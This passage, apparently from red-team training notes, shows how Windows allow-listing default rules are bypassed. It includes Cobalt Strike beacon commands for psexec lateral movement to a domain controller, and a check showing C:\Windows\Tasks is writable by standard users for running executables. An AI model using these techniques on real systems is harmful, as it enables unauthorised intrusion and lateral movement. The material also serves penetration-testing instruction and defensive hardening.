The default rules allow execution from anywhere within C:\Program Files and C:\Windows (including subdirectories). Moving laterally to a protected machine via psexec is trivial, because the service executable is written into C:\Windows.
beacon> jump psexec64 dc.dev-studio.com smb
Started service b8f5313 on dc.dev-studio.com
[+] established link to child beacon: 10.10.150.10
\
If you're on a protected machine as a standard user, there are several directories within C:\Windows that are writeable. One such example is C:\Windows\Tasks. This would allow us to copy an executable into this directory and run it.
beacon> powershell Get-Acl C:\Windows\Tasks | fl
Path : Microsoft.PowerShell.Core\FileSystem::C:\Windows\Tasks
Owner : NT AUTHORITY\SYSTEM
Group : NT AUTHORITY\SYSTEM
Access : CREATOR OWNER Allow 268435456
NT AUTHORITY\Authenticated Users Allow CreateFiles, ReadAndExecute, Synchronize <---
NT AUTHORITY\SYSTEM Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow 268435456
BUILTIN\Administrators Allow FullControl
Audit :
Sddl : O:SYG:SYD:PAI(A;OICIIO;GA;;;CO)(A;;0x1200ab;;;AU)(A;OICIIO;GA;;;SY)(A;;FA;;;SY)(A;OICIIO;GA;;;BA)(A;;FA;;;BA)
\
When enumerating the rules, you may also find additional weak rules that system administrators have put in. This is an example of a rule I've genuinely seen in production: